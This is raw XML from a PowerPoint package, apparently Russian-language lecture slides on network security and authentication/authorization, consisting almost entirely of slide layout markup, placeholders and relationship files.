          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{F343474C-8B8D-4735-928C-248C2492306F}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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1" r:id="rId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5" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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56" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="1249920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{05862E77-27A6-4CD7-A4B5-5435A390CB8E}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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3" r:id="rId3"/>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3" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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64" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{05E2E3B4-3A29-4518-B472-A821EED67F61}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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&lt;дата/время&gt;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5" r:id="rId3"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slides/_rels/slide1.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4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1.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.wmf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide12.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4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0.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0.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0.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0.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0.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0.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide23.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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/><Relationship Id="rId4"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0.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20.xml"/><Relationship Id="rId3"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0.xml"/><Relationship Id="rId3"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20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide29.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20.xml"/><Relationship Id="rId3"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oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.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20.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20.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20.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0.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide37.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20.xml"/><Relationship Id="rId3"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20.xml"/><Relationship Id="rId3"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0.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20.xml"/><Relationship Id="rId3"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image" Target="../media/image24.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout42.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20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide45.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20.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide45.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide46.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42.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide46.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide47.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20.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20.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9.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0.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20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide51.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20.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide51.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2.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide53.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20.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4.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide55.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20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide56.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20.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide56.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide57.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20.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8.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9.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide6.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.wmf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout42.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide60.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20.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide60.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide61.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slideLayout" Target="../slideLayouts/slideLayout42.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide62.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20.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide62.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3.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20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide65.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20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide7.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.wmf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide8.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.wmf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide9.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.wmf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.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6" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316080" y="466560"/>
            <a:ext cx="6779520" cy="2131560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">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4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Сетевая безопасность</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Text Box 2"/>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4440FEAF-C685-415C-9630-ABDCFF5CC8F9}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="278" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2428920" y="2857680"/>
            <a:ext cx="4569840" cy="342684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4" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468360" y="-14400"/>
            <a:ext cx="7125840" cy="1280520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Аутентификация/ авторизация</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="4014360" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="339840"/>
                <a:tab algn="l" pos="444600"/>
                <a:tab algn="l" pos="893880"/>
                <a:tab algn="l" pos="1343160"/>
                <a:tab algn="l" pos="1792440"/>
                <a:tab algn="l" pos="2241720"/>
                <a:tab algn="l" pos="2690640"/>
